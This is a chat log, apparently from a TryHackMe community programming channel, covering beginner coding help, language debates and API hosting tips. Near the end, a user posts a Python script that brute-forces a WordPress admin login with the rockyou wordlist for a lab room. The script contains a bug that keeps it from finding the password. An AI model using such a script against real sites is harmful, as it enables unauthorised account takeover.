As a general guidance: Split your problem into subproblems and see how you could solve those.

(This is called decomposition, and it's a really useful computational method.)

I think you shouldn't use readlines in that case, though, as it reads the file into a list. Iterating over the open file object should be more efficient.

Yeah, you can do for line in read if you open the thing

readlines is a basic function in python, just trying to keep it simple 😄

It works fine in simple cases 🙂

And it might be more efficient if you have to iterate through the data multiple times. (up until some point where the data structure size starts to slow things down)

Can anyone recommed any beginner friendly C\C++ sites to use? 😕

I like sololearn personally

Anyone can suggest good Javascript video course which is extensive and detailed?

You could check out codewithmosh on youtube

Pretty neat little framework ❤️ https://github.com/UnrealSecurity/luxon-framework

Pentester Acad: Javascript for Pentesters on Youtube:https://www.youtube.com/watch?v=8CAp9nzG7i0&list=PL1QxEH7x5E_WHlKSjxjXEBer6bRnF4cgT

I am enrolled in Javascript for Pentesters. Though that is a mainly on XSS. I am looking more on Development based Javascript. To understand more about bug bounty process.

Thank You will definitely look for it.

Hey guys

Definitions of advanced might vary. Just ask your question, and someone might be able to answer.

I think the same applies here. Do not ask to ask a question, just ask the question 🙂

Powershell Empire phishing Demo

is anyone working on any open source projects atm?

yee

Easy PR for you to contribute to open source 🥳

Fix the merge conflicts, make sure the tests pass and submit a pull request and you'll get added as a contributor 😄

https://github.com/HashPals/Name-That-Hash/pull/69

Bee is so kind giving opportunities to contribute by this good first issues .

thank you!!

Hi, I've been working on my first own bigger project for some time Last couple of days I've been hitting the wall, so I've decided to kindly ask for a help here.

My intention in the function below is to extract the least significant bit from every byte of the file and store into a byte array but I've been really struggling with the right way of doing it..

    public byte[] extractLSB(File file, int size) {

        FileInputStream fileInputStream = null;
        byte[] lsbByteArray = new byte[size];
        int arrayOffset = 0;

        int dataByte, extractedLSB;
        byte clearingByte = (byte) 0x01; // 0000 0001

        try {
            fileInputStream = new FileInputStream(file);

            // Read byte by byte from the file input stream
            while ((dataByte = fileInputStream.read()) != -1) {

                // extract lsb and save it to the lsbByteArray
                /*
                //I've been trying something like this

                    extractedLSB = dataByte & clearingByte; // ? get lsb
                    lsbByteArray[arrayOffset] <<= 1;        // make space for a new bit
                    lsbByteArray[arrayOffset] |= extractLSB; // "append" the lsb bit
                    arrayOffset++;
                 */
            }

            fileInputStream.close();

        } catch (Exception exception) {

            exception.printStackTrace();
        }

        return lsbByteArray;
    }

Any help is much appreciated.
Thank you in advance.

I would love to share this project with community soon.

Hi guys anyone to assist on how to store finger prints in MySQL database and how to retrieve data for use as authentication

Are you trying to store it as a bitfield?

Was think as a hash since we can't store as pictures

I mean you can totally store images in a DB but I'd probably look at libraries in the language you're using for fingerprints.

The shift is a bit wierd

Will it be a good idea especially when you want to use them to create a passport system

In that same case you also want to run a verification to check if the person applying for passport has no criminal record or anything like being investigated at that same moment

I feel like if you're asking for help programming a government system in TryHackMe, something might have gone wrong

Yaaa I know I'm just asking if implementing such a system is a good idea is that's ok

no it is a byte array because I will eventually create a file from it. about the bit shift, I did it on paper and it seems right. the problem is with the array iterator called arrayOffset.

Are you using unit testing and step through debugging? Walking through your call flow is going to give you a better idea of what's breaking.

Are you intentionally storing only a single bit in a byte?

Because what happens there is that the byte array will shift a zero value left by one bit, and then add the least significant bit from the file's read byte. Then, it will move to next byte

whatever the input in the file would be, the resulting array would contain only bytes with values 0x01 and 0x00

I come across a lot of python scripts in CTFs where is the best place to learn reverse engineering in python? Not a total novice I’ve done a 50hr UDEMY course so I’m an amateur at best.

IMO your best bet is going to be just learning python.
I like SoloLearn for learning the basics of a language, but then you'll want to play with it a bit and make some cool stuff to get to grips with how it works.

I haven't got that far with this project.

my intention is to extract just the lsb of each read byte and save it to the byte array so then I can recreate a file from the array.

That's where you should start with any code.

yes, but why shift when you're only storing bits only on the lsb of each byte?

TDD makes all dev processes easier to digest and understand. Strongly recommend you read 'Test Driven Development By Design'

I think I need to make a "space" for them so I can add them with |

huh?

the bytes in java are initialized to zero, and that's the other operand.

``` lsbByteArray[arrayOffset] is always zero when this line is executed.

for example I extracted 1 from the first byte so I will save it to the array, which contains now only [1]. then we move to another byte, for example lsb is once again 1 and extract it, now we need to make a space so do the shift to left and the array is [10]. to add the extracted 1 we will do array | 1 which will gives us [1,1] etc.

You're accessing the array elements by index. The array is initialized to size elements in byte[] lsbByteArray = new byte[size];

You don't need to make space for anything there. It's already the same length as size indicates.

If size is 2, the array would be [0, 0] right after new byte[size] has been run.

I've totally forgot about that ..

So basically what that shifting line does is: Get the value of lsbByteArray at current index, which is always zero and shift it left by one byte, and then assign back to lsbByteArray at current index.

It's no-op.

Thank you so much for your help.

I will get rid of the left shift and also I should be probably dividing the arrayOffset by 8 to correctly create bytes.

Hi everyone, just wondering, does anyone knows some clue about the history of insertion sort or the origin of its popularity ? Couldn't really find the source of information for those, so I thought of asking you all. Thanks 🙂

that sounds like a homework assignment and within the first page of google, there is something that mentions some of the origins. I would look at whatever textbooks you have or go look back at google

Nah, I tried googling. There wasn't much coverage for those that's why I tried asking here. The one article that mention the origin is very brief and state "it is difficult to ascertain as it pre-dates computing" and "it’s first use in a computation context traces back to 1945 when Konrad Zuse defined it as a primitive for the first high-level programming language: Plankalkül" but nothing more.

That sounds like a good place to start, @honest musk . As far as the sorts popularity, have you looked at the time and space complexity requirements for the sort and compared the complexity to other sorts?

Well, thanks for the response. I don't think I'd dive into those comparison though. As what I'd like to track down is the history of insertion sort in the context it as a widely used introductory sorting algorithm. So far, what I got for clues are "knuth's art of computing" for coining the term or so and it’s first use in a computation by Konrad Zuse (1945) where he defines it as a primitive for Plankalkul.

Gave +1 Rep to @magic falcon

In all honesty, Art of Computing is a great reference - but very dense.

Well, I guess I just gotta try to read it

What's your problem exactly? @obtuse iron

Is it worth learning Perl? It looks pretty funky. But internet dude whose page I've misplaced says ' It’s a language unlike most others and one I wish I could find a use for in my current job again'. Which suggests (a) might not help me with learning next language and (b)maybe not that useful. ... Realistically I'd probably get more mileage out of JavaScript. though...

You would definitely get more mileage from JavaScript in this day and age

Perl is still good to know, although Python largely does the same job (and more)

Perl still has some advantageous use cases; mostly centered around data stream editing.

IMO, you'd get a lot more mileage out of learning Python, Sed and awk

looking at Perl does feel like looking at classical Greek. Archaic and exotic.

Heh, it's definitely been around a while, although surprisingly, Python has been around for a similar length of time

for some reason Python just doesn't do it for me.

Python is one of the broadest use-case programming languages you could learn.

Ruby would be another good alternative to Python, although Python is the most widely used (scripting wise) for a reason

^^

If you are a beginner or intermediate programmer, not having it on your to-do list is doing your skillset a disservice

ahkay. hmm.

There are very few things it can't be used for 🤷‍♂️

Get over your distaste of PEP8 and learn it 🙂

There are weird corners of python (mostly around concurrency and the GIL) but it's a very solid choice in most situations you'd use a language for

the zen of python

Not so good for software development, unfortunately

Nim ftw

Nim?

Wonderful language

I hear a lot of talk about ruby, but i find the syntax too verbose. It slows me down when I'm in the groove

Agreed

Also, fluentd was written in ruby, and I loathe that product. A lot.

Anything associated with fluentd is contaminated to some degree, in my eyes

Nim is a compiled, Pythonic language. Really nice to write in, but compiles down to be faster than Golang

Ah I thought you meant vim lmao

It compiles to C first, then down to machine code, so in theory it should be as fast as C

If it compiles to good C...

the language landscape has exploded in recent years. Hard to navigate so many choices and frameworks as a noob.

I keep being drawn to C bc Linux but then ... also a bit archaic, really? Garbage collection would be nice.

C is a really good one to learn, but not a good one to start with

I started with Python and haven't turned back! So useful and easy to pick up 🙂

But I am also learning and have learned other languages

python

ftw

C can be archaic. But it's still the most powerful language you can learn. Memory management is really, really painful to learn - but knowing when to deallocate can give better insight into optimization in languages that have their own VM or interpreter

I started with Python and ended up with YAML. Hi 👋 I work with kubernetes

ok so checked out Nim ... sounds fun, but is it to compiled code as Dreamweaver is to html? It sounds almost like a WYSIWYG for programming sorta.

If you want the power and speed of C, learning a modern version of C++ (11 or newer, 17 for preference) is a good compromise. It's sort of like memory management lite, if RAII is followed correctly.

YAML is not a programming language, please don't ever say that again 🤮

bwahaha

It may as well be, I am a full time YAML Engineer

C++ vs C# ...

there is no comparison

c# is nice, lots of docs but it's different languages so

C# is hot garbage, C++ is considerably less so

no language is perfect

yeh seems diverged well down evolutionary tree

They are unrelated

C# is MS version of Java

~~pah....the best language is https://www.emojicode.org/~~

that explains it

I've read a dozen pages that failed to make that point juun.

C# does have some benefits. But really, I only ever see C# used in a pure MS shop and only then if it's a Unity or .NET environment.

Even in unity it's not super used, unity has a lot of GUI stuff to do what you want

Honestly, as a first programming language, python is fine.

my heart is in GNU/Linux

no unity the games engine haha :)

Just be aware that at some point you are going to need to learn assembly and C to some degree to be a good programmer

but that shouldn't be your first 3-4 years of programming unless you pick up C first

I learned C/C++ first, and it made learning python, scheme, haskell, scala, java all really easy.

CS50 teaches C first which is great tbh

Going the other way, there is a lot of stuff those other languages abstract away; paying attention to the inconsequential is what C does best and gives you the most power

I really prefer teaching new programmers an explicit strongly typed language first. I think it gives better insight and familiarity with data processing; JS hides all that from you, and it is unbelievably frustrating to think you are doing matrix multiplication with numbers and end up with a stupidly huge string instead.

The implicit type inference in JS is not my favorite, if that wasn't clear

yeah that makes sense. And tbh I always have a penchant for doing things the hard way. And archaic way... I like clarity and control and DIY over black box magic. I also value well established documentation.

C/C++ is going to be one of the best bets, then. Python is a front-runner on having usable documentation as well

Is The White Book still the Bible?

Richie and Kernigan? It's a really good C introduction.

For documentation, I go to cppreference.com

ah great, thanks. And thanks for setting me on the path. Very thought provoking convo.

C does get updated as well; C99 is still pretty popular though. That reference link has all major versions of the C and C++ libs very well documented, with helpful examples. The new C++ concurrency libs are really really nice to use, compared to the old-style POSIX mutex, semaphore and thread structures

I feel your pain, I also do a lot of k8s things. But saying YAML engineering is like saying INI or conf file engineering; it just makes one feel unpleasantly dirty to hear it

what about TS?

C# is used a fair bit in enterprise

That's probably true, Hydra. I haven't seen that part of it, though.

Never used it, no desire to use it. I dislike doing frontend anything, so I try to not touch that part of the stack

yea sounds good, just saying TS has the best typing I've tried

TS looks like an ok beginner programming language. The 'compiling' part of it looks pretty useless though. It's not really performing a compile step, it's parsing TS to generate JS. I'd need to see some good formal academic papers on TS to be confident that isn't teaching bad habits and poor understanding.

I agree with a lot of what @magic falcon said. Python is a bad language to start with, imo. The type safety is just stupid. It's cool for little toy projects, but if you want to build enterprise software, it's the wrong choice, imo.

For me, java strikes the best balance. And yeah, C# was just Microsoft's answer to java. They tried to steal the market share, and did manage to get some, but it's not as widespread.

I think the big thing that drove the rise in popularity of python is that it was easy to pick up and has few rules. So for non-software-engineers, it was quicker to "make a thing". Lots of data scientists and programmer noobs started with that, so it became a self-feeding cycle. But that's also where a lot of bad language features and bad code comes from, imo.

For Proof of Concept feasibility, it makes a lot of sense to bang something out in python. Because it's also a less dense programming language, usable code can be written very quickly, and formal system requirements are very light. My biggest problem with Java in the enterprise is the inability to run legacy Java applications on newer JVM versions. It's a huge pain to have multiple versions of java floating around because some ancient garbage app that is a business requirement was written in 1.6 and is not compatible with 1.8.

eh, that's what docker is for

and honestly, if something is 1.6 only.... that's like 15 years old at this point.

Again, enterprise. If an enterprise is using docker, they need to rethink their life decisions that brought them to that point. But just getting companies to take the plunge into containers is tough

Yeah the little 'make a thing' things are cute but then... bad code is bad. I feel like it might facilitate avoiding some of the tougher concepts, whereas C will make me grapple with them. I don't think I'll ever be much of a programmer - it might sounds stupid but a 'dream project' for me would be to maintain neglected-but-useful Linux packages. OH multiple versions: yes such a pain. I gather that happened with Perl. and when I was looking at python to teach my kid, it was at the juncture of two versions. Cripes even the Lego robot changed version.

even java8 is ancient, but still the most popular

I'd say if an enterprise is NOT using docker, they need to rethink their life choices

docker itself or containers? There is a difference

hm

crikey docker has been around for 8 years alraedy

Docker is fine in a dev environment, but lacks a lot of the oversight and management tooling for it to make sense in prod

I'd disagree with that. It's used in prod every day for some massive systems

But those companies have spent a LOT of time and money getting the management tools in place. To just start with vanilla docker in prod? That's crazy talk

Perhaps we're talking about different industries

Kind of getting far afield for programming now, though 🙂

in my world, docker is pretty much rules of the road

Possibly. The world I live in has a lot of NIST and CIS benchmark standards to adhere to.

and you're a software engineer by training/trade, right?

If docker can fulfill NIST SP 800 requirements, awesome. But I haven't worked with a customer doing that.

Software engineering is kind of where I started; I fell into an infosec engineering role, then into compliance. Now I do DevSecOps things

well, if you're running a govcloud EKS or ECS, you're using docker behind the scenes 😉

My work is normally a different flavor of k8s 🙂

personally, I think k8s is more fad than need, these days

it's what 'big data' was a decade ago

From my perspective, it makes fulfilling security controls a lot more friendly than what I've seen from docker. I'm not nearly as familiar with docker as k8s though, so there is a lot of stuff I don't know.

vastly oversimplifying, but k8s is just docker on steroids/docker networks.

If docker has a good baseline for CIS Benchmarks, or FISMA requirements I'd love to see the documentation on it

Kind of

The engine behind k8s is not docker anymore

At least, everything I've ready lately says the direction is CRI-O and not docker

docker swarm and k8s were competitors back in the day, but then k8s took off

and yeah, k8s is using a diff container engine now, I think. I actually don't know as much about it

well the transpiling process is done already on most js frameworks so they are compatible with older ecma script versions

I'll also add in that the internal networking of k8s looks substantially different than the internal networking that I've seen of docker/docker swarm

I don't know hardly anything about either one, so I can't speak to that

Hey everyone, i need help with my python code. I get key erorr. https://paste.pythondiscord.com/apewuheguh.kotlin

your dictionary seems to be missing several ,'s and :'s

im not sure about which lines are missing ' , : ' ?

what are you trying to do here?

first keeping students info in dictionary and then with the update function trying to add 2 more new students

and after calculation the grades it will print out if they passed or not

This sounds like homework.

it is

Great, good luck.

thank you.

def GecmeDurumu(ogrencil:dict) :
    for val in ogrencil.values():
        
        ogrencil=val["not"]
        gecmeNotu=val["gecme notu"]
        if ogrencil[0] * 0.3+ogrencil[1] * 0.2+ogrencil[2] * 0.5 >gecmeNotu:
            val["Durum"]="Gecti"
        else:
            val["Durum"] ="Kaldı"

        print(val["Durum"])

maybe this helps

now its value error for: too many values to unpack (expected 2)

hey everyone

anyone have experience with creating api's with python?

https://paste.pythondiscord.com/ojaceruvop.kotlin

oh thats makes sense

thank you @quiet falcon

Gave +1 Rep to @quiet falcon

Yes

can I send you a pm?

nah, just ask here. More eyes is more likely to get a good answer

ohhh trueee

okok so

im trying to build a covid api tracker thing

but what I dont know how to do is make it live updating

so like when more cases get added my api will be updated too

do you know how I can do something like this?

have you built any of it already, or just asking from a "step 1" perspective?

helloo, i wanna add my grain of salt on this! Where are you planning to get your data from?

didnt start the actual project yet, I am just experimenting with apis so I can get a basic understanding first

no idea right now asjdbadb

oh, okay

I just dont know where to get it from so it can work with the api

you should search for open apis that release data about covid

i mean, public, available data

but woudnt that defeat the whole purpose of me making my own?

it depends on what you plan to do with that data

I am using voiceflow to make like a google-home type of thing but for covid related stuff

but I want to make the api for it

so if you're wanting to make an auto-updating web-page essentially, that's more of a UI question than a python question

there are a few ways to do that, but honestly, I'm not a web dev, so I'm the wrong person to ask

oh hm

im using flask in python to make the api

is flask a good thing to use?

yes, flask is good

you also have django rest framework

I've used flask more than django

it's more bare-bones, but I prefer that

ohhhh I see I see

yes, flask only have the basics of what you need

im doing a hackathon tommorow and saturday so im just trying to get used to apis

I think it's better suited for what u need

hmmmm I see I see

I think the hardest part is trying to do the live updating part ngl

The thing is that I believe you need to query APIs that are released and maintaned by people working on covid projects

You can query another APIs with your own API

so basically put data from other api's (that have people updating it) into my own api

right?

The live updating can be done with refreshes I think, or WebSockets if you truly need the live part

Right

hmmmmm I seee

ill look into it

thank youuuu

No problem! Good luck!

thanksssss

if I have any other questions can I text u?

post them here, like EmptyBuffer said

okok thanks

If I'm online I'll reply them

GL

do you know if I can make the flask api public?

or will it only work locally

Depends on how you run it

You can set it to run on 0.0.0.0, which would mean public IPv4, although firewalls might get in the way @exotic skiff

if I do this then I can access it on devices outside of my network?

or only on the network

If you do that though, I would highly suggest not using the flask debug server (app.run). Use something like gunicorn or waitress (that's the one I've been working with lately and it's pretty good), and preferably stick it behind a reverse proxy like nginx

If you just set it to 0.0.0.0 then it will be accessible only inside your network if you're running it on a home network (yet to see a non-NAT home network)

You can set up a port forward in your router to get access from elsewhere though

cant I use a website like ngrok to make it public?

Well worth buying a domain name and setting it up through cloudflare if you want to make it public, running on your home network. Means you aren't exposing your public IP

You would need to use a DNS auto-updater though

hmmm

I think this is too much work just for a hackathon absdhbasdb

I believe you could, yes

Probably not the most trusted way to do that, but 🤷‍♂️

i might try to use ngrok though

hmmmmm

I mean i just need it to work for a couple of days for the hackathon

Then yeah, that would probably do

hmmmm okok thanks

got it working with ngrok haha

does anyone here still use perl?

funnily enough I asked about Perl yesterday. Did I pick up on some Zeitgeist?

I'm having issues with this bit of code

If some help me out with it?

language?

Python

okay what can i help

Or rather, anything that can handle HTTP requests

I'm trying to download a apache solr query

Which is 68million lines

To a python file

But whenever I input the authentication stuff

It just responds back with the HTML of the site when I use curl or wget

To be exact, it's 64891562 rows of CVS data

And the curl --user or -u doesn't seem to be working

🤔

I know, it's a lot of data

i don't really have experience with solr queries

Hmmm, know anyone I can go to?

not really :/

It's just that my cURL or WGET isn't working at all

when you mean not working

I set the password correctly

whats the error msg

it's meant to save data in files every 500mb, taking each line from the API from the site

But the server has authentication on it, which I have, but the -user filter doesn't work

I've tried setting cookies and everything

eh

use burpsuit

capture the download request

from a browser

then use the export plugin

to python request

thats what I would do

Hmmm

I was going to use that as a last resort. Just throught I'd come in here to ask before hand

cant think of anything else

I mean

I can think of the reason

Which is that the file that I'm trying to download is 300gb

are you sure you have the right download link

Which may be the reason

and not the page html link

It's not a download page. It's a query page

I've done this previously

But just having difficulties with this one cuz there is authentication

you do have permission to download / access it right?

I do

I have the login details to the solr apache dashboard

I do as well from my employer

okay

It's their company, I just have to export all data saved, I.E all filler and random stuff to the other solr apache server

And the main guy who sorts this out isn't in, so I have to do all of it from cli

yeah

id use burpsuite

capture the download request

Thanks man
I gives you a thumbs up for your help 👍

no worries

im sure somebody else might have another solution

¯_(ツ)_/¯

¯_(ツ)_/¯

Thanks regardless 😄

There's the python requests library, maybe?

Hydra, he's using that I think

I've tried requests already

specifically from requests - get()

Ah ok

all i know is you need to change the color of your screen to
inverted

it makes your pc faster

and help you code

Are you ok there?

Dark themes are great, but uh... let's give real advice please

Anyone Here?

I Got The Script Working But, It Doesn't Find The Password!

Hi

Some code would be nice

The Correct Password Is The First In The List But It Is Not Able To Find It!?

import requests

cookies = {
    'wordpress_test_cookie': 'WP+Cookie+check',
}

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Referer': 'http://internal.thm/blog/wp-login.php',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://internal.thm',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
}

passwords = [x.strip() for x in open('/home/kali/rockyou.txt', 'r').readlines() if x]

for password in passwords:
	data = {
	  'log': 'admin',
	  'pwd': passwords,
	  'wp-submit': 'Log In',
	  'redirect_to': 'http://internal.thm/blog/wp-admin/',
	  'testcookie': '1'
	}

	response = requests.post('http://internal.thm/blog/wp-login.php', headers=headers, cookies=cookies, data=data)

	if "<strong>Error</strong>: The password you entered for the username <strong>admin</strong> is incorrect. " not in response.text:
		print("Password Found: ", password) 

The Script :point_up:

This Doesn't Print Anything Even When The First Password Is The One!

Erm hang on a sec

I Did This For The Alternative For Hydra, WPScan For The Room, 'Internal'

TryHackMe Only...

If it's for a room

#room-help checkout this :)

Not Particularly. This Can Be Done Using Hydra But I Want Python. Can You Help Please?

@surreal bronze Did You Go?

No,

What I normally do is print out the response

Ok

And then hand look at it

Be patient. The help you get or don't get is all based on volunteer work.